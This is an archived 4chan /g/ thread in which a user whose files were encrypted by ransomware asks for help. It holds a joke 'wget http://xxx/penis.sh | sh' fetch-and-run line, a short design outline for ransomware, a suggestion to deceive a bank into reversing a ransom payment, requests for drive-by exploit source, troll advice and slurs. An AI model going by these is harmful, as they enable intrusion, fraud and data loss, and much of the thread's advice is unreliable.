[ 3 / biz / cgl / ck / diy / fa / g / ic / jp / lit / sci / tg / vr / vt ] [ index / top / reports / report a bug ] [ 4plebs / archived.moe / rbt ]

/vt/ is now archived.Become a Patron!

/g/ - Technology

View post   

[ Toggle deleted replies ]
File: 48 KB, 966x786, 2015-05-13_130311.png [View same] [iqdb] [saucenao] [google] [report]
47962853 No.47962853 [Reply] [Original] [archived.moe] [rbt]

Having a heart attack situation here, had to take a chill pill to stop my hands shaking, some malware has renamed all my photos and .txt files, extension adding an .exx to them and now they wont open, /g/ help, pic related

>> No.47962864

This bait never gets old.

>> No.47962868


>> No.47962905

you heartless troll morons

>> No.47962939


>> No.47963091

Wipe your drive and restore from backup.

>> No.47963106


>> No.47963117

By wipe, you don't mean format do you?

>> No.47963125

Restore from backups.
This is a non-issue.

>> No.47963128

fuckers copy the files before encrypting.
Use actve undelete or something else to scan the disk and recover what you can.

>> No.47963140

And if I turned off system restorm?

>> No.47963156

He didn't say system restore, he said backup. If you don't have backups then they must not have been that important files to begin with.

>> No.47963157

system restore has nothing to do with personal file backup.
It simply allows you to unfuck your OS.

i seriously hope you actually have backups because if not, i feel sorry for you dude i really do

>> No.47963191

why would I open this theme If I even had backups?

>> No.47963197

You're fucked
All you can do is try coughing up the shekels
Next time install gentoo

>> No.47963207

because you keep thinking there's some magical button or setting to make the virus magically unencrypt your files.

You're fucked.
Learn to make backups next time.

>> No.47963218

Why do you care? Your photos are obviously not that important for you to bother with offline backups of them.
If they are that important, you'd have offline backups.
If they're not that important, just thank the virus for clearing up your disk space.

>> No.47963220

buttcoiners are getting really desperate

>> No.47963232

Sounds like you either didn't have Common Sense Premium 2017 Ultra Edition installed or enabled.

Just restore a backup. Don't have a backup? Wow. Too bad for you.

>> No.47963254

So how much do they ask for the key?

>> No.47963262

6 btc

>> No.47963269

>tfw keeping all external drives disconnected till i need them
>TFW never keep them connected ever
>TFW this virus would havew absolutely 0 effect on me and i might lose a few downloads as a result but nothing major

>> No.47963279
File: 102 KB, 780x658, 1428954320083.jpg [View same] [iqdb] [saucenao] [google] [report]

GNU/Linux doesn't have this problem.

>> No.47963286

OP: you're fucked. Backups, etc.

By the way, how do people even get this shit on their systems?
I visit every kind of sketchy websites, and I haven't caught malware in 5+ years.

>> No.47963287

The worst thing about this ordeal is that OP still won't have backups after this.

>> No.47963309

Windows hides known file extensions by default, so plebs end up running executables when opening downloaded files.

>download porn

>search firefox on google
>download first link

>download latest hollywood jew movie

>> No.47963310

>wget http://xxx/penis.sh | sh
GNU/Linux has this problem, and it exists between the keyboard and chair.

>> No.47963321

Shoulda installed norton faggot

>> No.47963335

this is what you get for pirating video games

>> No.47963352 [DELETED] 
File: 260 KB, 358x310, bf8.png [View same] [iqdb] [saucenao] [google] [report]

Pay up or say bye

>> No.47963396

Try Shadow Explorer.

>> No.47963406 [DELETED] 

Where did you get "he" from? You should really use gender neutral language on an anonymous imageboard.

>> No.47963421

You are such a moron. Should be a lesson.

>> No.47963431

Are you sure the files are encrypted? They malware could just have appended the .exx extension to the files.

>> No.47963443

>gender neutral language
Sorry. I didn't mean to insult xir feelings. Should we go into a safespace and play with some playdoh and talk about our feelings?

>> No.47963448

Does that actually work? If the virus doesn't lie about RSA, it shouldn't.

>> No.47963466

no girls on the interbutts

>> No.47963471

2048 bit encryption is crazy. I wonder how long it took to encrypt all of your shit

>> No.47963502

12 hours to be exact around 40 000.png's 48 000 .jpg's 3000 .zip's plus the system files and others roughly 110 000 files

>> No.47963510

>implying backups aren't included in Common Sense Premium 2017 Ultra Edition Pro

step up, senpai

>> No.47963518

shut up, faggot

>> No.47963519

>I'm a special snowflake :D

>> No.47963524

12 hours, Is that the time you have been away from your computer?

If I were to make this program, I would store the encrypted versions of the files in a temporary directory until the encrypting is done, then I would replace all the unencrypted files with encrypted ones so It would appear instant.

>> No.47963539 [DELETED] 

What if there wasn't enough free space

>> No.47963546

>not knowing ancient memes

>> No.47963552

Well if that is the case, then you would do it in segments. Directory by directory.

This malware seems pretty advanced

>> No.47963569

How the fuck are people even catching this?

>> No.47963572 [DELETED] 

But then they would notice it and probably do something like panic and shutdown?

>> No.47963583

Considering op has;
40 000.png's 48 000 .jpg's 3000 .zip's

It wouldn't be hard to mistake one single file for something it's not

>> No.47963593

Didn't you notice your computer screaming for mercy?

>> No.47963699

I was sleeping in the other room, I did not clicked any .exe files the tricky thing masked itself as Microsoft Windows and asked me to make changes, it seemed legit so I clicked yes, next thing when I woke up, it was like I was still a nightmare... good thing for chill pills I almost had an infarct

>> No.47963719
File: 100 KB, 1254x261, no girls.png [View same] [iqdb] [saucenao] [google] [report]

Are you that faggot from the other day that complained about using "guys" even though it refers to womyn too.

>> No.47963758

how can anyone get viruses nowadays
i thought people knew how to torrent
this isn't some kazaa or emule shit where u put "movie.name.here.2015" and tons of shit would pop up
tpb and other popular sites most of the time the most seeded torrent is always said thing

>> No.47963793

That thing has a surprisingly good manual and is taking the user step by step through the process, even with "what when X doesn't work?" thingies.

would download 10/10

>> No.47963811

>restoring the encrypted data

>> No.47963813

I thought so too, but as more as I read about it, I notice more and more people had this ransome malware

You would download what???

>> No.47963819

oh, fuck ... didn't read "from backup"

>> No.47963822

>not getting the joke
why are you searching for help on the 4chins anyway?

>> No.47963833


I wouldn't be surprised if these things don't actually encrypt any files and they just change the file extensions, given that most of the retards who download stuff like this wouldn't know how to use the files any more with different file extensions.

>> No.47963839

>he actually uses Windows
You got what was coming to you.

>> No.47963852

Try removing the .exx extension. If it fixes the file then you just have to run malwarebytes or whatever and rename back all your files.

>> No.47963878
File: 17 KB, 1440x837, 2015-05-13_145405.png [View same] [iqdb] [saucenao] [google] [report]

I've tried it, before I even started the thread, it does not open

>> No.47963893

he probably thinks the criminal is here

>> No.47963899

How big of a retard do you have to be to even get something like this?

>> No.47963901

I didn't know that people loved the DOS encryption program so much that they converted it to windows 7. LOL what else did you expect.

>> No.47963904

OP READ THIS NOW -------------------------
You've been infected with TeslaCrypt.



Like the others said, you need to keep regular backups. You !at be in luck this time, who knows.

>> No.47963924

That word should have been "may". Not all ransomware is unrecoverable, some use static keys generated on your computer or stored in the file. Worse case: pay the ransom.

>> No.47963927 [DELETED] 

>when you still use emule and it works pretty alright for CP ;^)

>> No.47963934

Not unless you know your computer well. You can even use programs to prevent executable from creating new environment changes in an admin account.

Learn to program and exploit and never again use windows.

Did you know that windows 7,8 have many exploits, such as exploiting http.sys file to get into window. Idiots. Stop thinking windows is safe.

Linux is no better with their bash exploit.

>> No.47963961

>Linux is no better with their bash exploit.
Which has long been fixed

>> No.47963973

Doesn't this virus encrypt ALL your hard drives though. Not OP but I keep most of my HDDs and backup HDDs plugged in at the same time.

>> No.47963975

Here's something I don't get

How can encryption be so effective?

You need to do +4 DBAN (or maybe 1 or 50 depending on who you ask) runs to ensure your shit won't be recoverable by the feds

How can encrypting the shit ensure the old files can't be recovered? Whether by feds or a neckbeard at the local computer repair shop?

Also would it be possible to fetch a week-old backup and use it to help break the encryption on your malware-encrypted files?

>> No.47963995

Since their claims are legit, your options to get the data back are either pay up, or save all the files to an extra HDD and hand it down the generations until RSA-2048 can be decrypted in a single afternoon on a calculator. If you can make the purchase of the bitcoins to give them seem like someone else had access to your account, you could probably convince your bank to reverse the transaction, keeping the money.

>> No.47964001

>You need to do +4 DBAN (or maybe 1 or 50 depending on who you ask) runs to ensure your shit won't be recoverable by the feds
This isn't true so that explains the apparent contradictions.

>> No.47964008

what do you mean it masked itself as Microsoft windows?

>> No.47964010 [DELETED] 

Different cryptolockers target different things

>> No.47964011
File: 294 KB, 1024x768, 1407957458672.jpg [View same] [iqdb] [saucenao] [google] [report]

What's with the sudden increase in people getting ransomwared and frantically asking /g/ for help?

>> No.47964035

Just restore a backup.

Don't give those criminals any money.

>> No.47964036

Well, you see, I ran that setup.exe file and there was a dialog window created by the virus, pretending to be Windows. It asked me if I really want to run the setup.exe, and I said yes.

>> No.47964038

Unfortunately there is the scareware which is harmless, and then there is the cunty malware which actually encrypts files and folders on your PC.

Never underestimate the concept of routine backups to an external (and mostly offline) drive friend.

>> No.47964053
File: 340 KB, 1599x2181, 87204p.jpg [View same] [iqdb] [saucenao] [google] [report]

I see this stuff all the time at work.

You're fucked, OP. If you didn't make backups either pay up or say byebye.

>> No.47964055
File: 17 KB, 429x399, sip.jpg [View same] [iqdb] [saucenao] [google] [report]

You ran a random setup.exe that appeared out of nowhere?

>> No.47964056

First theyask us where to torrent from.
Now they all have ransomware.

I see a correlation.

>> No.47964060

No, not at all, I download it from the Internet prior to the incident.

>> No.47964065

What the fuck did you download?

>> No.47964069

To be clear, paying probably won't get your your files back.

>> No.47964070


>> No.47964072
File: 12 KB, 344x345, soda.jpg [View same] [iqdb] [saucenao] [google] [report]

Why did you download it?

>> No.47964073
File: 1.07 MB, 5616x3744, 1430189066088.jpg [View same] [iqdb] [saucenao] [google] [report]

>pretending to be Windows
>It asked me if I really want to run the setup.exe
>I said yes

You deserved it.

>> No.47964075 [DELETED] 
File: 16 KB, 251x235, 1424061296053.jpg [View same] [iqdb] [saucenao] [google] [report]

>where to torrent from.
And all you kikes said private trackers

>> No.47964079

>pretending to be Windows.

It was Windows you utter moron.

It was trying to stop you from installing dangerous software.

>> No.47964080

That variant doesn't actually use RSA, only AES with secret keys

>> No.47964081

You downloaded a single file called setup.exe, for no reason, and ran it?

>> No.47964095

from where did you download it? Are you even OP

>> No.47964100

He was probably trying to crack GTA 5 like every other gayman is right now

>> No.47964106

The basics of it is that you use a complex mathematical problem to obfuscate data, requiring the problem to be solved to make the data readable again. Possessing the decryption key essentially gives you the solution to the problem. Otherwise, you have to try and figure out the solution without being able to see the question. Encryption works because we can make problems that we lack the computing power to solve through brute force.

This is pretty far off point, but it's the best I can do while making it simple to understand.

>> No.47964108

>This fucking legit

>> No.47964113

You don't even know anything about what happened. How can you be so sure. I would be really really angry at you right now if not for those wonderful pills. Dude...

>> No.47964127

Well shit you're right, someone would just have to post the file on some torrent trackers / youtube videos and other places saying it's a cracked GTA5 and I bet they'll get loads of downloads
I didn't think it could be so easy

>> No.47964142

This guy. Drive densities are so high one pass is enough to make recovering anything mostly impossible. One of the leaked NSA newsletters had them celebrating that they managed to read data off a snapped CD - which took them months. Data recovery is hard.

>> No.47964147

The encryption is effective because there are problems the humanity does not have solution for. If you have two huge numbers, it's trivial to produce the product of them. But having the product, it's not feasible to do the reverse operation - find multipliers. RSA uses this one-way operation to make encryption possible.

>> No.47964149
File: 354 KB, 456x546, 1427762331549.png [View same] [iqdb] [saucenao] [google] [report]

We're trying to help you. It's not his fault you're retarded and run random .exe files you download from the internet.

>> No.47964162

>Windows asked me if I wanted to run totallynotcryptolocker.exe
>I said yes
>But anything could have happened!!11

>> No.47964163

Actually it most likely will. They honor their promise so people have an incentive to pay.

>> No.47964169
File: 107 KB, 1280x720, 1428920114084.jpg [View same] [iqdb] [saucenao] [google] [report]

I'm trying to imagine what happened in OP's brain.
>hey there's a random setup.exe file I don't remember I got it from
>better run it and see what happens, it might be dolphin porn lol

By the way, do you have a link for that malware? I'd love to give it a try.

>> No.47964172

>How can you be so sure.

Because that's how Windows works.
When you try to install something that isn't verified by Microsoft (and very few software is becasue it's expensive and time consuming) it will nag you for confirmation.

Have you never installed software?

>> No.47964184 [DELETED] 

>not disabling UAC

>> No.47964187

Also why the fuck would malware ever ask for confirmation?
It will just do it.

>> No.47964188

it was a virus i am sure of that

you guys are blind to your own shortcomings

>> No.47964208
File: 1.52 MB, 1065x902, 1426074080251.png [View same] [iqdb] [saucenao] [google] [report]

And you downloaded the virus and ran it.

>> No.47964221

it disguised itself as windows

no one would have seen through that

>> No.47964227

>it was a virus i am sure of that

No it wasn't.
You don't even know what a virus is and how it differs from a trojan HAHAHAHAHAHA.

Please fuck off back to /b/, we're all GLAD tech illiterates like you get fucked.

>> No.47964240
File: 335 KB, 800x1200, Yew 'avin a giggle mate.png [View same] [iqdb] [saucenao] [google] [report]

Is this the birth of an epic new meme?

>> No.47964246

i implore you to reconsider

>> No.47964247
File: 3 KB, 125x120, 1424585866680s.jpg [View same] [iqdb] [saucenao] [google] [report]

Not everyone downloads random executables from the internet that claims to be windows. Did you download it from microsoft.com? No?

You still willingly ran the file.

>> No.47964252

>it disguised itself as windows

So not only don't you know what a virus is, you also don't know what windows is.

You better be a troll becasue nobody should be this retarded.

>> No.47964258

>we're all GLAD tech illiterates like you get fucked
No we don't
Go away fucking dumb edgy wannabe tryhard retard. Goddamn shit.

>> No.47964260

Ignore people making fun of this, let me reason with you. If you made something like this, wouldn't you want it to be silent until most of the files were encrypted? Why pop up anything? Once your code is running it's already game over

>> No.47964277

OP, I'm not trying to sound like an asshole.
Just tell us what you downloaded and where you downloaded it from. Without that info we'll all just assume you're an idiot.

>> No.47964281

my mind says maybe but pills are giving me a resounding no

its people like you and >>47964252 >>47964247 who are jealous of the amazing programming capabiulities of twhoevver came up with the veirus

>> No.47964288

Not him, but please stop posting.

>> No.47964289
File: 26 KB, 320x320, janeway.jpg [View same] [iqdb] [saucenao] [google] [report]

He downloaded setup.exe from the internet.

>> No.47964304

Why not give your computer those pills that's clearly some strong shit

>> No.47964307

I'd like to know exactly what you downloaded and where from.

It would help others immensely.

>> No.47964327
File: 446 KB, 500x320, ngbbs5520b63b107bd.gif [View same] [iqdb] [saucenao] [google] [report]


>> No.47964349

reading this whole thread gave me a headache.

Op, you are a goddamn retarded chimp who shouldn't even be near a computer.

>> No.47964352

The Window blocked everything else, when I pressed Cancel, it appeared again, I was suspecting this was either a really ergent matter from Microsoft or malicious malware, but in either case I had to continue my work so I figure what the hell, since it did seem legit Microsoft crap and this was Windons8 I decide to click yes, and if it was a malware deal with it later, from my previous experience with viruses, I knew in worst case scenerio it will delete all, or and then I could restore, or less it will only infect the .exe files of my PC, alas it encrypted everything I cared for .txt .png and .jpg I never even heard of encrypting virus before, thus my gruesome mistake

>> No.47964357

I found the server:
It can be found by searching the server headers on shodan.io


Authors confirmed as opsec retards

>> No.47964372 [DELETED] 

There is no way people are that stupid

>> No.47964376

You still haven't told us what the file was supposed to be and exactly where you downloaded it from. I won't take "setup.exe from the internet" as an answer, be specific.

>> No.47964383
File: 81 KB, 1070x358, Screen Shot 2015-05-13 at 15.15.45.png [View same] [iqdb] [saucenao] [google] [report]

pic related

>> No.47964384

Apparently OP is

>> No.47964385

Where did you download the file from.

>> No.47964390

The internet

>> No.47964396



>> No.47964401

You know when I recall it, I think you are right, but each time I clicked cancel, the question appeared again, blocking everything else I have opened, so at the 1000 cancel click, I cave in and clicked yes... the rest I explained above.

>> No.47964405

Its actually one of the simplest to create. Use openssl to generate random key, loop through all files on drive, read them, openssl to encrypt them, write them as filename.exx, delete originals, submit secret key to server, show dialog demanding payment.

That is what is so scary about these - for something so simple they can be completely devastating and effective.

>> No.47964406

I'm trying to figure it out but my mind to too occupied right now for me to be able to produce the right answer. Boy am I glad I took those pills...

>> No.47964413

If you aren't OP fuck off.


>> No.47964425

>No, not at all, I download it from the Internet prior to the incident.
Ah, the Internet. THAT explains everything.

You're fucked OP, unless you pay up. Try to avoid paying if at all possible, don't give your money to crooks.

>> No.47964430

Not your average DO box. It blocks ping nodes and even when scanning without ping nodes it produces fuck-all results.

>> No.47964432
File: 73 KB, 720x602, 1426074448100.jpg [View same] [iqdb] [saucenao] [google] [report]

So not only did you download a random file from the internet, but it was so random that you don't even remember. People like you keep my store in business.

>> No.47964438

ok, op was a troll.
fun's over.

>> No.47964442


>> No.47964451

you heartless troll moron

>> No.47964467

I'm crying over here

>> No.47964468

These things can be downloaded by other malware. This person may have downloaded setup.exe, but it could have came from a bad torrent, a Facebook message attachment, an infected USB, or another computer on the network. Don't think you have to be stupid to get these.

>> No.47964474
File: 81 KB, 420x600, foryoursafety.jpg [View same] [iqdb] [saucenao] [google] [report]

OP might be a troll, but people really can be that stupid.

>> No.47964483


>blocks ping nodes
>ignores ping requests

FTFY. This is trivial on any linux box, it's a one line addition to your iptables rules.

>> No.47964489

>Don't think you have to be stupid to get these.
Yes you do.

Just look at every post from OP. He's a complete retard.

>> No.47964501

Maybe this'll teach you the importance of backups. Faggot.

>> No.47964504

He still downloaded setup.exe. He downloaded something from a shady website. If he never downloaded setup.exe he wouldn't have his issue.
It's entirely his fault.

>> No.47964510

inb4 this becomes copypasta

>> No.47964512

I'm going to find you and smash your face with a fucking shovel you little shit.

>> No.47964519

I'm not OP. It's just fucking funny for some reason.

>> No.47964532

Ok so looking at this (not op), how would the proper procedure be to avoid something like this fucking up your backups too

I run daily automated backups on an external HDD, but obviously someone could make malware like this that fucks over the backups too, by looping the mounted drives.

How do you deal with this problem? Literally unplug it after each backup?

>> No.47964539

Hopefully you'll never have to deal with anyone you care about or someone who cares about you getting one of these. OP got this from just one infection vector. Don't think that's the only way out there.

There were several adobe flash 0days that dropped ransom ware on computers without any warning, distributed through malicious ad banners on legitimate sites. You could be fully patched and everything secure yet still be caught out by that.

>> No.47964540

I know but your average server does not do this. that coupled with that the reverse dns leads to a slav shit domain that pretends to be "under construction" raises a couple of alarms

>> No.47964543

>implying its not a /g/entooman holding him ransom

>> No.47964552

This is what you get for not keeping backups, how does one even get a virus like that if you're not a complete moron. I bet you fell for the common sense® meme too.

>> No.47964558

>downloading flash anywhere but adobe.com
>downloading flash ever

Pants-on-head retarded.

>> No.47964571

Yes, the whole HDD not just some partitions.

>> No.47964590

>raises a couple of alarms
>know home of call for ransom-malware

Can't fool you huh?

>> No.47964594
File: 252 KB, 600x641, smarter than my dog.png [View same] [iqdb] [saucenao] [google] [report]

I need it to play Bloons Tower Defense 5.

(I'm not lying. My account is at level 73 and I have about 16K Monkey Money.)

>> No.47964601



Don't be a fucking idiot and write off everyone who uses flash as a retard. Keep pretending firefox, ie or chrome 0days have never existed.

>> No.47964611

I think you meant curl

>> No.47964613

I have 200 torrents+ mostly tv shows, each time I start the computer this question has appeared maybe from 4-5 months, eahc time I clicked cancel, except for yesterday when it appeared in the middle of my work which it never did, yesterday I downloaded only one torrent but when it completed my files were already encrypted and with added .exx to them, did not even had a chance to install or click anything from the torrent, so it could not be from it, this is the link if anyone wants to check http://www.torrenthound.com/hash/a1d8e4297ef8c9c23780561747c84b760d37a34d/torrent-info/Metal.Gear.Solid.2.Substance-SiMON

>> No.47964621

How would backups help?
Assuming it encrypts all your externals + NAS, then the backups would get infected too.

and making backups is useless if it isnt automatic. uploading everything online would take ages for someone with 100kb/s upload speed.

>> No.47964623

what reason is there to use curl when you have wget

>> No.47964630

The hilarious thing about cryptolocker is that people dumb enough to get it are the same people dumb enough to not have backups.

Incidentally, I've always wondered: How *do* people get cryptolocker?

I mean, it's not like you go on google search and search “cryptolocker install” and run the .exe, is it?

What kind of fucked up things are these people actually installing? I don't get it

>> No.47964645

>willingly using botnets

>> No.47964651

For some reason I missed the fact that there wasn't even a TLD and thought there would actually be some amusing script at the end of that.

Screw you for getting my expectations up.

>> No.47964656

>this question has appeared
useful information

>> No.47964666

>flash can give you malware
>having flash installed
>not having noscript installed
>not blocking flash by default
>not having CSRF whitelist enabled
>not blocking all ads by default anyways

do you even browser security

>> No.47964667

The key is in the registry

>> No.47964676

Why dont you nigger just simply renamed the file extension ? :)

>> No.47964696

why don't you read the thread

>having flash installed
flash is needed for a lot of legit sites. not having it installed would be extremely annoying. I just have it blocked by default, and enabled on trusted sites.

>> No.47964728
File: 780 KB, 300x225, 1431428525445.gif [View same] [iqdb] [saucenao] [google] [report]

This is why I'm glad I use Linux.

>> No.47964748

I can't tell if /g/ is either incredibly gullible or has transcended bait and is stringing the OP along pretending not to get that it's bait

>> No.47964753


>> No.47964756
File: 120 KB, 1024x640, 134_8_0_prm-generic1_1024x640.jpg [View same] [iqdb] [saucenao] [google] [report]

That's what happens when you pirate, you dirty commie.

You know why I never get these sort of things? Because I buy my shite.

There's no such thing as a free lunch and OP just found that out the hard way.

>> No.47964763


>> No.47964765

Fucking idiot, don't you think he would have done that already if he had backups?

>> No.47964770

Similar thing happened at a local company and that shit spread over WiFi, so I had 1 month od work for me.
All I did was put MSE (yes) on a CD and boot every computer in safe mode and cleaned it.
Tho this one might be different

>> No.47964795



>> No.47964807

what the hell? is that saber? why does she look so weird?

>> No.47964809

Thank you sir, I pressed CTRL+R and type in "regedit" I am current in the registry, how to search for the key?

>> No.47964811

i've been pirating shit for 12 years, on windows, and have never gotten anything malicious.

that includes using keygens, cracks and visiting sketchy sites that redirect

>> No.47964815

This reminds me of the time when some 10 year old kid and his father came to my store and asked me to fix the kid's tablet. It had this lock on it that said that the kid was caught browsing zoophilia and child pornography and they had to pay $300 for the Department of Homeland Security to not send him to jail forever.

If I could only describe the look on their faces. I wouldn't be surprised if the kid got a beating before they even came to the store.

>> No.47964832

Why are you so fucking gullible?

>> No.47964840

If it's teslacrypt, it uses a long patched flash exploit.

>> No.47964855

The fuck are you talking about?
I'm not saying I believe OP for a minute.

I'm saying you don't need flash completely uninstalled.

>> No.47964885
File: 557 KB, 1920x1080, Andrea & Jenn go APARTMENT HUNTING - THE ANDREA & JENN SHOW ep. 1.mp4.Still001.jpg [View same] [iqdb] [saucenao] [google] [report]

I have backups on Google Drive with versioning so even if the encryption tried to overwrite the backup copies as well, I could just restore the files to their original state.

CryptoLocker BTFO.

>> No.47964907

>some malware has renamed all my photos and .txt files

how'd you take the fucking screenshot then? :^)

>> No.47964921

Or you could just use CryptoPrevent and never have to worry about this shit again.


>> No.47964933

Durr hurr Common Sense 2015. Durr hurr, I'm a retard.

That's what you get, faggot.

Next time stop being a cheap cunt and buy a proper AV license like Kaspersky Total Security 2015 or Bit Defender Total Security 2015.

Hell, If you're still a cheap shit, get Avira.


>> No.47964951


>> No.47964958
File: 328 KB, 1024x623, Check-Out-the-Revamped-Click-to-Play-Flash-UI-in-Firefox-3.png [View same] [iqdb] [saucenao] [google] [report]

If you absolutely NEED Flash, then I understand you having it installed because some services still require it, but if you don't have it set to click-to-play in your browser and instead have it set to always run on any website, you dun goofed.

NEVER have Flash or any other plugin run on a website without your explicit permission.

>> No.47964987

>I put my files in the botnet!
>I win against viruses!
>...right guys?

>> No.47964997
File: 32 KB, 504x348, TotallyAVirusYouGuise.jpg [View same] [iqdb] [saucenao] [google] [report]

Did it look like this picture? If so, it was a User Account Control pop-up. That's Windows. It's to notify you that a program is trying to access administrator-level privileges. This can be changes to system settings and files, installing a program, or starting a program. This has the potential to completely destroy your system if it's malicious code. It was not a program trying to masquerade as Windows. Malicious code will at all costs avoid giving you an option to not have it run.

I hope that next time you'll think twice before running exes from the web, especially if you can't be sure that it's legit.

>> No.47964999

You can make an argument for flash, but anyone who still uses JAVA applets in this day and age should be strangled to death.

NEVER run java inside your browser EVER.

>> No.47965009
File: 20 KB, 207x172, 0466 - HmuIYFv.png [View same] [iqdb] [saucenao] [google] [report]

>le ebin botnet meme

>> No.47965019

They raided databases of previous cryptolockers, and toasted them on the web.

>> No.47965028


>> No.47965032

Is it really a meme when we talk about Google? I thought everyone on /g/ you've heard of Snowden and NSA long time ago.

>> No.47965038
File: 392 KB, 697x667, 0477 - YIcwQy8.jpg [View same] [iqdb] [saucenao] [google] [report]

I use Linux and only install packages from signed repos to be on the safe side.

This has served me well over the past 10 years.

>> No.47965046

Got exactly what you deserve for

a.) Being stupid enough to run Windows
b.) Being stupid enough to install malware

Install Gentoo or leave /g/ forever.

>> No.47965058


>> No.47965074

I want to know this

Feeling sorry for you OP
Honestly I might've clicked on the file to just to know what is it

I download many stuffs and as I have shit Internet I check things twice before deleting them
>I feel sorry for you bud

>always install an anti virus and an anti malware
>because you never know :^]

>> No.47965080

it was broken longer

>> No.47965091

There are ways to get lifetime Malwarebytes Anti-Malware licenses, I suggest that even to the 'Common Sense' meme crowd.

>> No.47965098

What's wrong with running Windows?

>> No.47965109

Carnival Phantasm. Go watch it.

>> No.47965118

That's Firefox.

>> No.47965145

OP is probably one of those retarded children or unemployed neckbeard virgins that reply "common sense 2015" to threads that ask what the best antivirus is.

He is also one of those retards that disabled UAC because "it's inconvenient and bothered me too much" or some shit.

In other words, OP is a faggot and deserves all of this bullshit.

>> No.47965148
File: 36 KB, 528x492, 0549 - pUyjYAP.jpg [View same] [iqdb] [saucenao] [google] [report]

It's not Unix, that's what's wrong.

>> No.47965159

Wget doesn't output to stdout without -O - or saving to /dev/stdout
And smallpox is still a problem despite being eradicated entirely. Just like polio and the USSR. It's not a problem anymore.

>> No.47965163

It only ran once, encrypting all the files it could, then ceasing. Ergo, any new files will be safe.

>> No.47965171

>disabled UAC because "it's inconvenient and bothered me too much"
Except UAC is useless.
Do you really need a fucking pop-up reminding you that every single executable can make changes to your system? Nigger you're retarded.

>> No.47965177

Fuck off, freetard. Some of us have jobs and need Windows to run work related programs, but you wouldn't know, since you're an unemployed neckbeard that lives in his parent's basement, jacks off to anime and has nothing but time to be autistic and fuck around with an unusable hipster OS.

>> No.47965200

>downloading flash
>not using chrome

>> No.47965203

format your hard drive
never use windows ever again
never run software from outside of your repos ever again
restore everything you need from your backups

>> No.47965205

UAC is worse than that, it only works on some specific folders.

>> No.47965206

No, you are retarded, UAC can stop autoexecuting programs from fucking your shit up by not allowing them to run immediately and telling you that they are trying to run, in which case you can tell it to not let them run.


>> No.47965213

I like your memes, very nice

>> No.47965215


>> No.47965216

>submit secret key to server
Do you really think they woul unlock your PC if you pay them?

>> No.47965219

xxx is a tld

>> No.47965226

>UAC can stop autoexecuting programs
You don't need UAC to stop auto-executing, are you fucking serious?

You really are a fucking dumbass child that has no idea what they're doing.

>> No.47965236


>> No.47965243

So, what sudo does that UAC doesn't?

>> No.47965244

Oh, good point. Doesn't have an A record attached to it, though.

>> No.47965272


Isn't little late for preventing anything, all my files are already crypted to shit

>> No.47965276

seems like you wouldn't know either seeing as your workplace doesn't even provide you with a separate computer for work
using microsoft word at school doesn't count as work :^)

>> No.47965277
File: 99 KB, 600x350, emma-watson-smiling.jpg [View same] [iqdb] [saucenao] [google] [report]

There is literally NOTHING wrong with using Firefox.

>> No.47965299

it auto-runned with each start of windows, and I cancled it each time, it did looked like this, but yesterday it ran in the middle of my work and I clicked yes... since each time I clicked cancel it appeared back blocking all else what was in the background

>> No.47965309


>> No.47965314

They are too completely different things. One is a notification prompt, the other is a temporary privilege elevation. Can't compare them really.

>> No.47965320
File: 1.52 MB, 400x255, 1425173663617.gif [View same] [iqdb] [saucenao] [google] [report]

so instead of booting into safemode and removing it, you just ignored it until you got frustrated and let it infect your system.

You are absolutely fucking retarded to the highest level.

>> No.47965328

>literally NOTHING wrong with using Firefox

>> No.47965335


count the amount of threads open that actually discuss technology and not just consumer bullshit.

>> No.47965336

From 1 to 10 how retarded you have to be to get one of these?

>> No.47965352

Retarded enough to use windows.

>> No.47965365

The wit of 4chan of astounding

>> No.47965393

- Spend $100 on an external HDD

- Dual boot Windows and GNU/Linux. Only boot into Windows when needed, i.e. to play a game

Problem solved.

>> No.47965417


>> No.47965455
File: 2 KB, 562x90, 2015-05-13_175420.png [View same] [iqdb] [saucenao] [google] [report]

Could this fella really be telling the truth, and the simply solution of my problem is in the registry?

>> No.47965479

Probably not, unless the dev put it there to troll.

>> No.47965481

Cryptolocker detected.

>> No.47965485



>> No.47965492

This isn't a big problem, you just need to figure out the distribution of prime numbers

>> No.47965495

>did not install gentoo
Why couldn't you follow simple instructions?

>> No.47965502

Well duh of course they would. The point of modern ransomware is that it does decrypt if you pay them, so people spread the word that you can pay to get the files back and they make more money.

If binary analysis guys come back saying "nope it just erases files with random junk" then what's their business model? Cryptowall has made millions from people payinh. They even offer a service for you to decrypt a file for free to prove they can.

>> No.47965551
File: 64 KB, 397x366, 1398691785896.jpg [View same] [iqdb] [saucenao] [google] [report]


Just pay up.

>> No.47965561

No goyim. Go hustle for sheckles elsewhere.

>> No.47965572

Hey, a superior Linux users here...
Just wanna see what kind what kinda windblow problem a regular windblow users have

>> No.47965586

That doesn't solve anything. It makes you feel better for spending less time in Windows, as if malware is installed by some cumultative probability. Try thinking how people encounter malware, beyond muh dangerous OS.

>> No.47965594

fucking retards

>> No.47965596

No he was just spouting shit.
Malware programmers aren't that retarded.

>> No.47965609

>downloading and running executable files
hue hue hue

Tbh you are fucked unless this has been reversed and their server compromised, congrats, you lost.
Go format and stop enabling flash and java. Don't run executables that aren't verified.

>> No.47965654

>links to an executable on their server
>privacy policy and terms of use links go nowhere
seems legit

>> No.47965840
File: 442 KB, 2048x1536, unless1.jpg [View same] [iqdb] [saucenao] [google] [report]

unlesssss... I take off this HDD wire it to another PC with a Norton on it, delete the virus, and then decrypt my files back to normal again?

>> No.47965937

Kinda. There have been copycats that will not decrypt your data. I recall of one where they found key to unlock so you don't have to pay and the earlier ones didn't fuck with your shadow copy so you had a chance of getting some files back.

>> No.47965981

>decrypt a file for free

sounds great

>> No.47966049

There is nothing wrong with running java, all security issues have been fixed for years now.

>> No.47966071


>> No.47966154

>nothing wrong with running java
Not to worry you or anything.
Plus I know of at least 3 exploit packs that currently use java to do driveby attacks.

Go get mbam, clean off the virus and pray that someone has the actual cryptware reversed and they fucked up the key generation part.

>> No.47966202

are those drivebys public yet?

>> No.47966229

Not to my knowledge but they operate mainly in russia and taiwan right now, I know the people who sell them, it's a huge business and that's how they get by, buying 0 days and reselling them in a pack so that less experienced people can run botnets and be charged while they don't really get caught.

>> No.47966246

alright, what is bmab?

if they fucked up the key generation part, it would be easire for the reversed cryptware to turn the file back to normal?

>> No.47966260

Ive been out of the loop for a while, you might be able to point me in the right direction.
Do you know of any drivebys that still work that have the source published? I dont care if its silent or not.

>> No.47966265

Get the free one, use it to clean your pc up, and yes if they fucked up the encryption part and someone reversed it there might be hope for your files but that's a 1/1000 chance.

>> No.47966275

OP you need to delete system 32.

